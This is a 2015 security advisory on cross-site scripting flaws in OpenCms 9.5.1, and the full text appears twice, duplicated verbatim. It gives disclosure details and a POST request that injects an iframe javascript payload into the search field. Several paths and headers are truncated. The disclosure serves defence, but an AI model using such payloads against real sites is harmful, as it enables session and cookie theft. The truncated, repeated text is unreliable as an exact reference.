Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/
Discovered and Credits: Rehan Ahmed (knight_rehan@hotmail.com)
______________________________
Overview
______________________________
Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
______________________________
Vendor's Description of Application
______________________________
OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.
http://www.opencms.org/en/
______________________________
Vulnerability Details & Exploit
______________________________
Method: GET
/opencms/system/modules/org.
/opencms/system/workplace/
/opencms/system/workplace/
/opencms/system/workplace/
Method: POST
POST /opencms/system/modules/org.
Content-Type: application/x-www-form-
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept-Language: en-US
Accept: text/html,application/xhtml+
Referer: http://127.0.0.1:8080/opencms/
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104
action=search&query=<iframe src=javascript:confirm(0);&
______________________________
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/
Discovered and Credits: Rehan Ahmed (knight_rehan@hotmail.com)
______________________________
Overview
______________________________
Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
______________________________
Vendor's Description of Application
______________________________
OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.
http://www.opencms.org/en/
______________________________
Vulnerability Details & Exploit
______________________________
Method: GET
/opencms/system/modules/org.
/opencms/system/workplace/
/opencms/system/workplace/
/opencms/system/workplace/
Method: POST
POST /opencms/system/modules/org.
Content-Type: application/x-www-form-
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept-Language: en-US
Accept: text/html,application/xhtml+
Referer: http://127.0.0.1:8080/opencms/
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104
action=search&query=<iframe src=javascript:confirm(0);&
______________________________